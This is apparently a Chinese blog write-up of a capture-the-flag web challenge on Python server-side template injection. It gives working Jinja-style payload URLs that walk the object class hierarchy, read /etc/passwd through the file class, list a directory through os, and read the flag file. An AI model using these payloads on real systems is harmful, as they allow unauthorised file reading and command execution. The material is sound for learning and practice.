攻防世界Web_python_template_injection

Web_python_template_injection

根据题目意思有点像python的ssti模板注入

我们来测试一下

在这里插入图片描述
在这里插入图片描述

果真存在那么我们就用ssti的基本方法了

我们先来看看全局变量

在这里插入图片描述

在这里插入图片描述

我们先来寻找一下基类

http://111.200.241.244:62377/{{''.__class__.__mro__}}

在这里发现了object类

在这里插入图片描述

寻找<type ‘object’>类的所有子类中可用的引用类

http://111.200.241.244:62377/{{''.__class__.__mro__[2].__subclasses__()}}

在这里插入图片描述

这里可以看到有一个<type ‘file’>类,就是文件操作的类,我们尝试拿他的方法进行文件读取,file类的下标为40

http://111.200.241.244:62377/{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

在这里插入图片描述

这里发现这个类可以进行系统执行

在这里插入图片描述

http://111.200.241.244:62377/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}} #listdir('.')列出当前目录

在这里插入图片描述

我们通过文件读取把文件读出来

http://111.200.241.244:62377/{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

在这里插入图片描述

posted @ 2022-03-20 19:32  听梦外雪花飞  阅读(136)  评论(1)    收藏  举报